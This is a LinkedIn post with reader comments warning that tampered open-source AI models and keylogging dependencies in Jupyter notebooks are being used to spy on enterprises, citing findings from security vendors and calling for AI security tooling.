Avivah Litan’s Post

View profile for Avivah Litan, graphic

Open Source #AI Models and Applications Used to Infiltrate Enterprises Some 1% of open-source models on Hugging Face are reportedly infected. 😆The word is out: Open-source models and data science software (like Jupyter Notebook or Python libraries) are prevalent new AI attack vectors. AI security vendors HiddenLayer and Noma Security see evidence of this when they scan open-source AI at customer sites. In fact, Microsoft Azure AI recently started using Hidden Layer's Model Scanner https://lnkd.in/e42wpBGu to scan third party and open source models in the model collection curated by Azure AI. 😆Enterprise AI is under the radar of most Security Operations, where staff don’t have the tools required to protect use of AI. Traditional Appsec tools are inadequate when it comes to vulnerability scans for AI entities. (Many Appsec vendors are hurriedly expanding capabilities for new AI markets). 😂Importantly, #Security staff are often not involved in enterprise AI development and have little contact with data scientists and AI engineers. Meanwhile, attackers are busy uploading malicious models into Hugging Face, creating a new attack vector that most enterprises don't bother to look at. 👀Noma Security reported they just detected a model a customer had downloaded that mimicked a well-known open-source LLM model. The attacker added a few lines of code that caused a forward function. Still, the model worked perfectly well so the data scientists didn't suspect anything. BUT every input to the model and every output from the model were also sent to the attacker, who was able to extract it all. 👀Noma also discovered thousands of infected data science notebooks.  They recently found a keylogging dependency that logged all activities on their customer's Jupyter notebooks. The keylogger sent the captured activity to an unknown location, evading Security which didn’t have the Jupyter notebooks in its sights. An example of this type of dependency confusion attack using Pytorch was widely publicized in 2023. See https://lnkd.in/ecBaXrS3 ✔AI events will multiply exponentially with the adoption of autonomous AI agents. New AI Trust Risk and Security Management (TRiSM) measures that auto-remediates most ‘bad’ transactions without human intervention are needed. ✔These solutions must be baked into AI infrastructure and support different business goals and programs. AI generates too much information too fast for humans to keep up with. Security, Developers, Data Scientists, and IT staff need AI engineering skills to help build this AI infrastructure out. 🤣Otherwise, already overworked security organizations will likely crash. #cybersecurity #opensource #datascience #appsec #artificialintelligence #genai Gartner Niv Braun

  • No alternative text description for this image
Long Duong

IT / OT / Product / AI Security

1mo

Thank you for sharing, Avivah. Would you be kind enough to share the links to (1) Noma Security reports on infected data science notebook and (2) infected open-source model on HuggingFace? Thank you.

Thank you for sharing Avivah.

Like
Reply
Andy C.

Making intelligence relevant & actionable in the fight against fraud

1mo

Insightful! Avivah - Thanks

Like
Reply

This is exactly why we are focusing on helping companies know who is contacting them, as GenAI deepfakes are only going to get better. If you are answering the phone, or on live chat - how do you do know who is really on the other end?

Robert Braxton

Authorised Distributor for Binarii Labs Products, Cyber Warden, Business Development.

1mo

AI Trust Risk and Security Management (TRiSM) measures can significantly benefit enterprises by ensuring AI systems are compliant, fair, reliable, and secure. These measures help integrate governance upfront, addressing AI's unique trust, risk, and security management requirements that conventional controls do not cover.

Niv Braun

Co-Founder & CEO at Stealth

1mo

Thank you Avivah for spotlighting another great security risk as part of the new Data & AI Lifecycle. These new technologies contain significant business value for organizations, and spotlights like yours enable their secure adoption. It's our pleasure at Noma to collaborate and contribute our part.

Ellen Walsh

PSM, PMP, Agile Leader of Innovation Projects

1mo

Great observations. Agree that Infosec and data science depts at most companies are not yet well connected and data science models do not yet have the capacity to spot these types of security threats.

Huy NGUYEN TRIEU

Entrepreneur, Academic, Investor, Banker. Co-founder CFTE | Entrepreneurship Expert, Oxford | Venture Partner, Mundi Ventures | Former MD, Citi

1mo

Fully agree Avivah. If I was a hacker, I would create smart AI wrappers based on Chatgpt APIs, offer them for free and steal information (actually use information people voluntarily give me....)

Frances Zelazny

Co-Founder & CEO, Anonybit | Strategic Advisor | Startups and Scaleups | Enterprise SaaS | Marketing, Business Development, Strategy | CHIEF | Women in Fintech Power List 100 | SIA Women in Security Forum Power 100

1mo
Mauricio Ortiz, CISA

Great dad | Inspired Risk Management and Security Profesional | Cybersecurity | Leveraging Data Science & Analytics My posts and comments are my personal views and perspectives but not those of my employer

1mo

True! The speed of AI usage is already creating security blind spots and the security teams are not well-prepared or have the tools to help them to close or detect these security gaps

See more comments

To view or add a comment, sign in

Explore topics